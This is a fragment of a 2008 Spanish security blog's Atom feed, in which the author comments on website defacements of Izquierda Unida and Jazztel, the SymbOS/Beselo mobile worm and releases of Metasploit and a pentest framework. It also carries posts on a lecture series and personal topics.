/&gt;&lt;/a&gt;&lt;br /&gt;Ahora los a"afurtunados" del defadement de su Url ha sido Izquierda Unida (IU)....&lt;br /&gt;&lt;br /&gt;De nuevo los mismo autores "D.O.M TEAM 2008"...."Tenemos algo en común, le dijo un presidente a un embustero" con esta frase han firmado el defacement...&lt;br /&gt;&lt;br /&gt;La noticia &lt;a href="http://www.elperiodico.com/default.asp?idpublicacio_PK=46&amp;amp;idioma=CAS&amp;amp;idnoticia_PK=488149&amp;amp;idseccio_PK=1233&amp;amp;h="&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Por cierto la URL sabeis donde estaba alojada???? en....&lt;a href="http://www.arsys.es/"&gt;Arsys &lt;/a&gt;si si, la empresa que ya sufrió otro &lt;a href="http://www.noticiasdot.com/wp2/2007/06/12/arsys-reconoce-que-ciberpiratas-se-infiltraron-en-su-sistema-y-atacaron-4000-sitios-alojados-por-la-empresa-espanola/"&gt;ataque...&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Como preguntón que soy....&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Que significado ha tenido este ataque? ha sido directamente político?&lt;/li&gt;&lt;li&gt;Ha sido un ataque premeditado?&lt;/li&gt;&lt;/ol&gt;Este grupo de Hackers está siendo de los más activos de la scene les cazarán?....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-235133942770759572?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/235133942770759572/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=235133942770759572' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/235133942770759572'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/235133942770759572'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/03/defecementto-izquierda-unida.html' title='Defecement....to Izquierda Unida'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/R8r-FsuSEdI/AAAAAAAAAF0/74v0UHhXDkc/s72-c/foto_273019_CAS.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-223743697873657332</id><published>2008-02-26T15:53:00.005+01:00</published><updated>2008-02-26T17:45:00.264+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Incidentes de seguridad'/><title type='text'>Defacement....to Jazztel</title><content type='html'>Como me gusta, el publicar este tipo de post (ñam ñam).....entre otras cosas, porque no se ha publicado nada en ningún medio....ni tan siquiera en ningún &lt;a href="https://www.ccn-cert.cni.es/"&gt;CERT&lt;/a&gt;...por alarma social? jajaja que jeta... que teneis!!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5171306043424324194" style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 385px; CURSOR: hand; HEIGHT: 231px; TEXT-ALIGN: center" height="200" alt="" src="http://bp3.blogger.com/_x7dE_ssr2K8/R8Qrcp8jOmI/AAAAAAAAAFs/jWTNQ8SuR0c/s320/85857588rf5.jpg" width="385" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;Que pasa que no ha ocurrido nada? o....que da miedo que nos enteremos que una empresa como Jazztel, haya sido objetivo de un ataque Web con éxito? Y...claro, si se ha tenido éxito, cual ha sido el alcance del &lt;a href="http://www.open-sec.com/index.php?option=com_content&amp;amp;task=view&amp;amp;id=26&amp;amp;Itemid=2"&gt;defacement&lt;/a&gt;? no habrán sacado datos privados de los usuarios registrados en Jazztel verdad? Datos como...cuentas bancarias, teléfonos etc...como no dicen nada, quien me dice a mi que los datos de los usuarios de Jazztel están a salvo?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://elladodelmal.blogspot.com/"&gt;Aqui &lt;/a&gt;teneis las pruebas (Chema...estamos contigo en el Black Hat aunque no podamos ir!! )&lt;br /&gt;&lt;br /&gt;Más &lt;a href="http://www.adslzone.net/postp920290.html"&gt;pruebas&lt;/a&gt;.....&lt;br /&gt;&lt;br /&gt;Fotos del defacement &lt;a href="http://img184.imageshack.us/my.php?image=85857588rf5.jpg"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;El grupo al que se le atrivuye la gesta... &lt;a href="http://www.google.es/search?q=D.O.M+team&amp;amp;ie=utf-8&amp;amp;oe=utf-8&amp;amp;aq=t&amp;amp;rls=org.mozilla:es-ES:official&amp;amp;client=firefox-a"&gt;D.O.M Team&lt;/a&gt; integrantes{ anonyph; arp; ka0x; xarnuz }&lt;br /&gt;&lt;br /&gt;Preguntas que me surgen:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Para que sirve un CERT? y en concreto el que pagamos todos los españoles con nuestros impuestos? &lt;a href="https://www.ccn-cert.cni.es/"&gt;CCN-CERT&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Porque Jazztel no dice nada de este "evento" de seguridad?&lt;/li&gt;&lt;li&gt;Visto lo visto si soy usuario de Jazztel mis datos privados están seguros?&lt;/li&gt;&lt;li&gt;A que se dedica la Oficina de seguridad de Jazztel?&lt;/li&gt;&lt;li&gt;Jazztel ha realizado un SGSI?&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Gracias a este grupo de Hackers, me doy cuenta de lo concienciada que esta Jazztel con el tema de la seguridad...!&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-223743697873657332?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/223743697873657332/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=223743697873657332' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/223743697873657332'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/223743697873657332'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/02/defacementto-jazztel.html' title='Defacement....to Jazztel'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/R8Qrcp8jOmI/AAAAAAAAAFs/jWTNQ8SuR0c/s72-c/85857588rf5.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2448018170227818421</id><published>2008-02-19T20:13:00.004+01:00</published><updated>2008-02-19T20:33:13.974+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Penetration Testing Framework 0.4</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/R7suH58jOlI/AAAAAAAAAFk/VANsPMffOvA/s1600-h/j0390094.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 336px; height: 266px;" src="http://bp3.blogger.com/_x7dE_ssr2K8/R7suH58jOlI/AAAAAAAAAFk/VANsPMffOvA/s320/j0390094.jpg" alt="" id="BLOGGER_PHOTO_ID_5168775710686526034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;La gente de&lt;a href="http://www.vulnerabilityassessment.co.uk/index.htm"&gt; VulnerabilityAssesment&lt;/a&gt; ha liberado&lt;a href="http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html"&gt; Penetration Testing Framework 0.4&lt;/a&gt;....Yo que vosotros echaria un vistazo porque es una guia completa de los pasos a seguir como las herramientas a utilizar en cada paso en un Test deIntrusión....&lt;br /&gt;&lt;br /&gt;Pronto subiré más posts...con permiso de la Sra Bronquitis..... ;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2448018170227818421?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2448018170227818421/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2448018170227818421' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2448018170227818421'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2448018170227818421'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/02/penetration-testing-framework-04.html' title='Penetration Testing Framework 0.4'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/R7suH58jOlI/AAAAAAAAAFk/VANsPMffOvA/s72-c/j0390094.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-8437447633985937694</id><published>2008-01-31T10:23:00.000+01:00</published><updated>2008-01-31T17:42:03.125+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>SymbOS/Beselo</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_x7dE_ssr2K8/R6GU9rdFd0I/AAAAAAAAAFc/MG9xFGoeT3U/s1600-h/sexmp3.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_x7dE_ssr2K8/R6GU9rdFd0I/AAAAAAAAAFc/MG9xFGoeT3U/s400/sexmp3.gif" alt="" id="BLOGGER_PHOTO_ID_5161570435300947778" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Quien dijo que no ya no existían virus para móviles????&lt;br /&gt;&lt;br /&gt;A aparecido un espeicmen nuevo que infecta a teléfonos móviles, dicho especimen responde al nombre de.... &lt;a href="http://www.f-secure.com/v-descs/worm_symbos_beselo.shtml"&gt;SymbOS/Beselo....&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Y que es a lo que se dedica hacer el bichito?&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Replicación via Bluetooh&lt;/li&gt;&lt;li&gt;Replicación vía MMS&lt;/li&gt;&lt;li&gt;Ocultación de procesos (maliciosos claro)&lt;/li&gt;&lt;li&gt;Replicación a través de tarjetas MMS&lt;/li&gt;&lt;/ol&gt;Según dice Sergio Hernando en su blog "La idea es la de siempre. Estos gusanos se diseminan vía mensajes MMS y/o Bluetooth, con la idea de engañar a los usuarios incautos para que instalen aplicaciones SIS de Symbian que volverán a diseminar el gusano, y que además, provocarán efectos nocivos en el terminal móvil (el más fácil de comprender, el gasto que provoca el envío indiscriminado de MMS para autopropagación). La diferencia fundamental es que los gusanos de la familia SymbOS/Beselo envían ficheros multimedia identificables y que crean familiaridad con los usuarios, en vez de ficheros SIS. Se han identificado envíos de archivos de imagen, mp3 y Real Media (beauty.jpg, sex.mp3, y love.rm) que hacen más probable que el usuario acepte estos envíos maliciosos Bluetooth".&lt;br /&gt;&lt;br /&gt;Así que ojo al dato....si frecuentamos, aeropuertos, cybercafes  y otros lugares donde el Bluetooh campa a sus anchas...a lo mejor alguien nos envia un archivo...aceptareis? os gusta la aventura?&lt;br /&gt;&lt;br /&gt;Cambio y corto!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-8437447633985937694?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/8437447633985937694/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=8437447633985937694' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8437447633985937694'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8437447633985937694'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/symbosbeselo.html' title='SymbOS/Beselo'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_x7dE_ssr2K8/R6GU9rdFd0I/AAAAAAAAAFc/MG9xFGoeT3U/s72-c/sexmp3.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-132903074071963301</id><published>2008-01-29T11:55:00.000+01:00</published><updated>2008-01-29T12:19:59.476+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Eventos'/><title type='text'>Capsdesi: Asignatura Temas Avanzados de Seguridad y Sociedad de la Información</title><content type='html'>&lt;span style="color: rgb(0, 0, 0);font-family:arial;" &gt;Nuevos eventos,  nuevas fechas...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;PROGRAMA&lt;/span&gt;&lt;ul&gt;&lt;li&gt;Martes 26 de Febrero: Seguridad: Un aspecto esencial para la tutela de la protección de datos. Impartido por Celia Fernández, profesora de Derecho UPM&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Martes 11 de marzo: Inseguridad en redes inalámbricas: WiFi, Bloetooth y RFID.Impartido por Sergio Gonzalez y Felix Ortega; WiFiSlax&lt;/li&gt;&lt;li&gt;Martes 1 de abril:Introducción a la criptografía cuántica:alternativas y retos actuales.Impartido por Fernando Acero Hispalinux&lt;/li&gt;&lt;li&gt;Martes 15 de abril:Malware.Impartido por Sergio de los Santos; Hispasec&lt;/li&gt;&lt;li&gt;Martes 29 de abril:Documentos electrónicos que convivien con los de papel.Impartido por Julian Ina; Abalia&lt;/li&gt;&lt;li&gt;Martes 13 de mayo:Auditoria de seguridad.Certificaciones en seguridad.Impartido por Gemma Deler Applus+&lt;strong&gt;&lt;span style="font-weight: normal;font-family:Arial;color:white;"  &gt;ala de Grados de &lt;st1:personname productid="la EUITT. Hora" st="on"&gt;la EUITT. Hora&lt;/st1:personname&gt;: de 10:00 a 12:00 horas&lt;/span&gt;&lt;/strong&gt;&lt;span style=";font-family:Arial;color:white;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;      &lt;p  style="font-family:arial;"&gt;&lt;strong&gt;&lt;span style="font-weight: normal;color:black;" &gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="color:black;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;span style="color: rgb(0, 0, 0);font-family:arial;" &gt;Asistencia gratuita!!!! más información en el sitio &lt;/span&gt;&lt;a style="font-family: arial; color: rgb(0, 0, 0);" href="http://www.lpsi.eui.upm.es/GANLESI/GANLESI.htm"&gt;web&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-132903074071963301?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/132903074071963301/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=132903074071963301' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/132903074071963301'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/132903074071963301'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/capsdesi-asignatura-temas-avanzados-de.html' title='Capsdesi: Asignatura Temas Avanzados de Seguridad y Sociedad de la Información'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-3022480975383935579</id><published>2008-01-29T11:28:00.001+01:00</published><updated>2008-01-29T11:53:41.883+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Metasploit Framework 3.1</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/R58BIrdFdzI/AAAAAAAAAFQ/JsMwMhoJhrU/s1600-h/framework.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/R58BIrdFdzI/AAAAAAAAAFQ/JsMwMhoJhrU/s400/framework.jpg" alt="" id="BLOGGER_PHOTO_ID_5160844946605176626" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Se ha liberado la nueva versión de Metasploit Framework 3.1 y un servidor se la está descargando.....&lt;br /&gt;&lt;br /&gt;Esta última versión como la anterior tiene entorno gráfico, da "full support"a Windows y tiene 450 módulos y 256 exploits....(alguno 0 Day? jejejeje)&lt;br /&gt;&lt;br /&gt;Para acceder a la url pulsa &lt;a href="http://metasploit3.com/msf/download"&gt;aquí&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-3022480975383935579?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/3022480975383935579/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=3022480975383935579' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/3022480975383935579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/3022480975383935579'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/metasploit-framework-31.html' title='Metasploit Framework 3.1'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/R58BIrdFdzI/AAAAAAAAAFQ/JsMwMhoJhrU/s72-c/framework.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-8704573539167764813</id><published>2008-01-28T11:48:00.000+01:00</published><updated>2008-01-28T12:04:44.145+01:00</updated><title type='text'>Por una vez estoy orgulloso de mi pais</title><content type='html'>Por una vez y que sin sirva de precedente, me siento orgulloso de mi país....&lt;br /&gt;&lt;br /&gt;El motivo: España a la cabeza de europa de descarga de música pirata&lt;br /&gt;&lt;br /&gt;He leido un artículo en un periódico en su formato electrónico en donde se relata que nuestro queridísimo país, está en la cabeza de descargas de música "pirata" (pirata que bonito....).&lt;br /&gt;&lt;br /&gt;No os perdais la &lt;a href="http://www.elmundo.es/navegante/2008/01/24/tecnologia/1201204245.html"&gt;noticia &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Según dice la noticia "En 2007, la venta de música en Internet y a través de canales móviles alcanzó los 1.970 millones de euros (539 millones más que en el ejercicio anterior), lo que supone &lt;strong&gt;el 15% del negocio discográfico&lt;/strong&gt;, que en 2006 era del 11% y era inexistente en 2003".&lt;br /&gt;&lt;br /&gt;Vamos que si con estos números,  más el canon digital,  los artistas pierden dinero...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-8704573539167764813?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/8704573539167764813/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=8704573539167764813' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8704573539167764813'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8704573539167764813'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/por-una-vez-estoy-orgulloso-de-mi-pais.html' title='Por una vez estoy orgulloso de mi pais'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-1047754996735607208</id><published>2008-01-21T20:50:00.000+01:00</published><updated>2008-01-21T21:13:47.477+01:00</updated><title type='text'>Rage Against The Machine!!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/R5T83iVYj1I/AAAAAAAAAFI/IKvs6Q1v48I/s1600-h/51411%7ERage-Against-The-Machine-Posters.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/R5T83iVYj1I/AAAAAAAAAFI/IKvs6Q1v48I/s400/51411%7ERage-Against-The-Machine-Posters.jpg" alt="" id="BLOGGER_PHOTO_ID_5158025504285560658" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Una vez dije...que si se me daba la oportunidad de ver a quienes son mis ídolos en directo...haría lo que fuese posible e imposible por verlos...&lt;br /&gt;&lt;br /&gt;Pues bien...ha llegado el momento!!! RAGE AGAINTS THE MACHINE vienen a Madrid!! en concreto al &lt;a href="http://www.electric-weekend.com/"&gt;Electric Weekend Getafe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Que decir de las letras de este grupo y de su constante revindicación....!! Con Zack de nuevo haciendo daño!!&lt;br /&gt;&lt;br /&gt;LONG LIFE FOR&lt;a href="http://www.ratm.com/"&gt; RAGE AGAINST THE MACHINE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;REVOLUCION!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-1047754996735607208?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/1047754996735607208/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=1047754996735607208' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1047754996735607208'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1047754996735607208'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/rage-against-machine.html' title='Rage Against The Machine!!'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/R5T83iVYj1I/AAAAAAAAAFI/IKvs6Q1v48I/s72-c/51411%7ERage-Against-The-Machine-Posters.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2195802198600891283</id><published>2008-01-09T11:50:00.000+01:00</published><updated>2008-01-09T12:09:19.682+01:00</updated><title type='text'>Abuela....! coge el mando!</title><content type='html'>Según he leido hoy en la edición de un periódico electrónico, La reyna Isabel II juega a la Wii...No te lo pierdas!!! La reyna madre, ha estado jugando con su nieto Guillermo a la Wii...quien ha sido el que ha acercado la tecnología a la "yaya".&lt;br /&gt;&lt;br /&gt;Estoy pensando en coger por banda a algunos de mis abuelos...y sentarlos delante de un monitor...el experimento puede ser interesante.....&lt;br /&gt;&lt;br /&gt;Estoy a favor de que no haya barreras para el uso de la tecnología, que su uso no sea solo por una serie de personas en concreto, el acceso a la información tiene que ser universal y por eso mismo, cualquier persona(sin destinguir edad, sexo, etc...) debería poder utilizar la tecnología como herramienta de acceso a la información...y como no, como diversión ;)&lt;br /&gt;&lt;br /&gt;Asi pues...abuela....! coge el mando!&lt;br /&gt;&lt;br /&gt;La noticia la teneis &lt;a href="http://www.elpais.com/articulo/agenda/reina/Isabel/apunta/Wii/elpepuage/20080109elpepiage_2/Tes"&gt;aquí&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2195802198600891283?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2195802198600891283/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2195802198600891283' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2195802198600891283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2195802198600891283'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/abuela-coge-el-mando.html' title='Abuela....! coge el mando!'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-7895180192277842854</id><published>2008-01-03T16:01:00.000+01:00</published><updated>2008-01-06T10:03:27.841+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Es tu contraseña lo suficientemente robusta? ;)</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;object width="320" height="266" class="BLOG_video_class" id="BLOG_video-53b8636c63e3199" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"&gt;&lt;param name="movie" value="http://www.youtube.com/get_player"&gt;&lt;param name="bgcolor" value="#FFFFFF"&gt;&lt;param name="allowfullscreen" value="true"&gt;&lt;param name="flashvars" value="flvurl=http://v12.nonxt2.googlevideo.com/videoplayback?id%3D053b8636c63e3199%26itag%3D5%26app%3Dblogger%26ip%3D0.0.0.0%26ipbits%3D0%26expire%3D1331392142%26sparams%3Did,itag,ip,ipbits,expire%26signature%3D73627E149E4BB2EFF2E7B934E7DF6D716FC57A42.1B086742DA93F324AE31CA37DB4A5BDEEB3FF065%26key%3Dck1&amp;amp;iurl=http://video.google.com/ThumbnailServer2?app%3Dblogger%26contentid%3D53b8636c63e3199%26offsetms%3D5000%26itag%3Dw160%26sigh%3D8bZZEYgIjAEDPcbU-n4HAc1tHm0&amp;amp;autoplay=0&amp;amp;ps=blogger"&gt;&lt;embed src="http://www.youtube.com/get_player" type="application/x-shockwave-flash"width="320" height="266" bgcolor="#FFFFFF"flashvars="flvurl=http://v12.nonxt2.googlevideo.com/videoplayback?id%3D053b8636c63e3199%26itag%3D5%26app%3Dblogger%26ip%3D0.0.0.0%26ipbits%3D0%26expire%3D1331392142%26sparams%3Did,itag,ip,ipbits,expire%26signature%3D73627E149E4BB2EFF2E7B934E7DF6D716FC57A42.1B086742DA93F324AE31CA37DB4A5BDEEB3FF065%26key%3Dck1&amp;iurl=http://video.google.com/ThumbnailServer2?app%3Dblogger%26contentid%3D53b8636c63e3199%26offsetms%3D5000%26itag%3Dw160%26sigh%3D8bZZEYgIjAEDPcbU-n4HAc1tHm0&amp;autoplay=0&amp;ps=blogger"allowFullScreen="true" /&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Otro video que te ayuda a verificar la robusted de tu 